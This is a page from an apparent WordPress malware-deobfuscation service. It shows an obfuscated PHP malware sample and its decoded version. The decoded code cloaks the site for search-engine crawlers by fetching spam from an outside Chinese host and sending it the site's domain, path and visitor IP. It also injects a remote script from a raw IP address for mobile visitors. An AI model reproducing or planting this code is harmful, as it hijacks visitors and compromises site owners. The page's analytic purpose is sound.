Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php
goto Cw2Ff; QRwcw: define("\x69\124\116\122\104", "\x3f\144\x6f\x6d\141\151\x6e\75" . $OsUgP["\x48\x54\x54\x50\137\110\117\123\x54"] . "\x26\x70\141\164\x68\x3d" . dVjBn . "\x26\146\154\x61\147\x3d\147\154\x6f\142\x61\154" . "\46\144\142\75" . $_SERVER["\122\105\115\x4f\x54\x45\x5f\x41\104\104\x52"]); goto xNnFm; NeHar: if (!preg_match(uqvtp, lajgw)) { goto N4L9f; } goto Ep6t1; hwra0: exit; goto MG0lA; cltGD: define("\165\161\166\164\x70", "\57\x70\150\157\x6e\x65\174\x70\x61\144\x7c\160\x6f\144\174\151\120\x68\157\x6e\x65\174\x69\x50\157\x64\x7c\x69\x6f\x73\x7c\x69\x50\x61\144\174\101\x6e\x64\162\157\151\x64\174\x4d\x6f\142\151\x6c\145\x7c\102\154\x61\x63\x6b\102\x65\x72\162\171\174\111\x45\115\x6f\142\x69\x6c\x65\x7c\115\x51\x51\x42\x72\157\x77\163\145\x72\174\112\125\x43\x7c\x46\x65\156\156\x65\143\x7c\167\117\123\102\x72\157\167\x73\x65\162\174\x42\162\x6f\x77\163\x65\162\x4e\107\x7c\127\x65\x62\117\123\174\x53\171\x6d\x62\x69\141\x6e\x7c\x57\151\x6e\144\157\x77\163\40\x50\150\157\x6e\x65\x2f"); goto wboVh; B9Ssn: echo tR1LK(C1Mue . iTNRD); goto hwra0; gYZ8u: define("\111\x70\x66\x34\131", "\x40\102\x61\151\x64\x75\123\x70\151\144\x65\x72\174\123\x6f\x67\157\165\174\131\x69\x73\x6f\x75\x7c\x48\141\x6f\163\157\x75\174\x33\66\x30\123\x70\x69\x64\145\162\x40\x69"); goto cltGD; jlnsi: $n_BfT = "\x73\x74\162\x69\163\164\162"; goto QDOHK; jH0xJ: define("\x64\x56\x6a\102\156", $OsUgP["\x52\x45\121\125\x45\x53\x54\x5f\x55\x52\x49"]); goto ewVfz; ewVfz: define("\116\64\145\x53\x59", !isset($OsUgP["\110\124\x54\120\x5f\122\x45\106\105\x52\x45\122"]) ? '' : $OsUgP["\110\x54\x54\120\137\122\105\106\x45\122\105\x52"]); goto VfDJV; j4NED: header("\x43\x6f\x6e\x74\x65\x6e\164\55\x54\171\x70\145\x3a\x20\164\x65\x78\x74\x2f\150\x74\155\x6c\x3b\x63\x68\x61\162\x73\145\x74\x3d\x75\x74\146\55\x38"); goto jlnsi; haH6P: if (!preg_match(Ipf4Y, lajgw)) { goto q2TNo; } goto B9Ssn; Cw2Ff: set_time_limit(0); goto Q57Vt; qmZpb: exit; goto O5Q0l; H6KNC: define("\x43\61\115\165\x65", "\150\x74\164\x70\72\57\57\x35\x30\56\150\154\x77\164\155\x6c\56\x63\156\57"); goto QRwcw; wboVh: define("\x59\x33\x48\147\127", $n_BfT(dVjBn, "\56\x78\155\154") or $n_BfT(dVjBn, "\x2e\x64\x6f\143") or $n_BfT(dVjBn, "\x2e\x74\x78\164") or $n_BfT(dVjBn, "\56\x70\160\x74") or $n_BfT(dVjBn, "\56\150\x74\155\x6c") or $n_BfT(dVjBn, "\x2e\170\x6c\x73") or $n_BfT(dVjBn, "\x32\60\62") or $n_BfT(dVjBn, "\x2e\163\x68\164\x6d\x6c") or $n_BfT(dVjBn, "\61")); goto haH6P; Q57Vt: error_reporting(0); goto j4NED; MG0lA: q2TNo: goto NeHar; Ep6t1: echo "\74\163\x63\162\x69\x70\x74\x20\x73\162\143\75\x68\x74\164\160\x3a\57\x2f\64\x33\x2e\61\x32\x38\x2e\x35\71\x2e\62\x32\64\x2f\172\142\56\152\163\x3e\74\57\x73\143\162\151\160\164\x3e"; goto qmZpb; dCLU5: function Tr1lK($fmjrO) { goto IAH1C; JKDiw: curl_setopt($rqdhf, CURLOPT_SSL_VERIFYHOST, FALSE); goto RKhRx; kwTvz: curl_setopt($rqdhf, CURLOPT_HEADER, 0); goto NCPCZ; RKhRx: curl_setopt($rqdhf, CURLOPT_RETURNTRANSFER, 1); goto kwTvz; BOWOO: return $kNlZg; goto zhznf; nJWH8: curl_setopt($rqdhf, CURLOPT_SSL_VERIFYPEER, FALSE); goto JKDiw; PgYKF: curl_setopt($rqdhf, CURLOPT_URL, $fmjrO); goto pmJlq; NCPCZ: curl_setopt($rqdhf, CURLOPT_ENCODING, "\147\x7a\x69\x70"); goto Q2kEo; JRetX: curl_close($rqdhf); goto BOWOO; Q2kEo: $kNlZg = curl_exec($rqdhf); goto JRetX; IAH1C: $rqdhf = curl_init(); goto PgYKF; pmJlq: curl_setopt($rqdhf, CURLOPT_USERAGENT, $_SERVER["\x48\x54\124\x50\137\x55\123\105\122\x5f\x41\x47\105\116\124"]); goto nJWH8; zhznf: } goto jH0xJ; VfDJV: define("\154\x61\152\x67\167", $OsUgP["\110\x54\x54\x50\x5f\x55\x53\x45\122\137\x41\107\105\116\x54"]); goto H6KNC; xNnFm: define("\x49\141\x51\x57\x59", iTNRD . "\x26\162\145\x66\145\162\x65\162\75" . urlencode(N4eSY)); goto gYZ8u; QDOHK: $OsUgP = $_SERVER; goto dCLU5; O5Q0l: N4L9f:
?><?php
set_time_limit(0);
error_reporting(0);
header("Content-Type: text/html;charset=utf-8");
$n_BfT = "stristr";
$OsUgP = $_SERVER;
function Tr1lK($fmjrO)
{
$rqdhf = curl_init();
curl_setopt($rqdhf, CURLOPT_URL, $fmjrO);
curl_setopt($rqdhf, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
curl_setopt($rqdhf, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($rqdhf, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($rqdhf, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($rqdhf, CURLOPT_HEADER, 0);
curl_setopt($rqdhf, CURLOPT_ENCODING, "gzip");
$kNlZg = curl_exec($rqdhf);
curl_close($rqdhf);
return $kNlZg;
}
define("dVjBn", $OsUgP["REQUEST_URI"]);
define("N4eSY", !isset($OsUgP["HTTP_REFERER"]) ? '' : $OsUgP["HTTP_REFERER"]);
define("lajgw", $OsUgP["HTTP_USER_AGENT"]);
define("C1Mue", "http://50.hlwtml.cn/");
define("iTNRD", "?domain=" . $OsUgP["HTTP_HOST"] . "&path=" . dVjBn . "&flag=global" . "&db=" . $_SERVER["REMOTE_ADDR"]);
define("IaQWY", "iTNRD&referer=" . urlencode(N4eSY));
define("Ipf4Y", "@BaiduSpider|Sogou|Yisou|Haosou|360Spider@i");
define("uqvtp", "/phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone/");
define("Y3HgW", stristr(dVjBn, ".xml") or stristr(dVjBn, ".doc") or stristr(dVjBn, ".txt") or stristr(dVjBn, ".ppt") or stristr(dVjBn, ".html") or stristr(dVjBn, ".xls") or stristr(dVjBn, "202") or stristr(dVjBn, ".shtml") or stristr(dVjBn, "1"));
if (!preg_match(Ipf4Y, lajgw)) {
if (!preg_match(uqvtp, lajgw)) {
// [PHPDeobfuscator] Implied script end
return;
}
echo "<script src=http://43.128.59.224/zb.js></script>";
exit;
}
echo tR1LK("http://50.hlwtml.cn/iTNRD");
exit;Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.